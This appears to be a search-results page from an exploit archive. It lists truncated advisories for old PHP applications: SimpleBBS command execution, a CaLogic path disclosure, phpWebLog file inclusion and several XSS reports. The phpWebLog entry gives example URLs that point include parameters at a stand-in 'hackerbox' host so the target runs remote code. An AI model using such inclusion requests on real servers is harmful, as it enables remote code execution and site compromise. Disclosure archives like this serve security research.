25 matches found
SimpleBBS 1.1 - Remote Command Execution (C)
SimpleBBS 1.1 - Remote Command Execution C / SimpleBBS !--total 188 drwxrwxrwx 2 f1 f1 4096 Dec 6 17:02 . drwxr-xr-x 7 f1 f1 4096 Nov 17 2002 .. -rw-r--r-- 1 f1 f1 916 Oct 20 09:30 WSFTP.LOG -rwxrwxrwx 1 f1 f1 28 Nov 17 2002 categories.php -rwxrwxrwx 1 f1 f1 151 Dec 7 09:11 forums.php -rwxrwxrwx ...
Full path disclosure in CaLogic 1.22 and possible in older versions.
Full path disclosure in CaLogic 1.22 and possible in older versions. Language: PHP Project name: CaLogic Risk: Low Home page: http://www.calogic.de Discovered by: GB & Zetha Explotation examples: http://target/calogic122/doclsqlres.php Fatal error: Call to a member function on a non-object in...
phpWebLog <= 0.5.3 Arbitrary File Inclusion
No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...
msnXSS.txt
--0-821799311-1102416389=:1811 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit This is gonna be quick'n'dirty. My dinner is almost cooked... More XSS for MSN to add to the list: 1. Cross site scripting In JavaScript context...
VirtuaSystems VirtuaNews 1.0.x (Multiple Modules) - Cross-Site Scripting
source: https://www.securityfocus.com/bid/9812/info It has been reported that the VirtuaNews non-default modules 'Files' and 'Vulns' are prone to multiple cross-site scripting vulnerabilities. These problems surround the application's failure to properly validate user supplied URI input. When...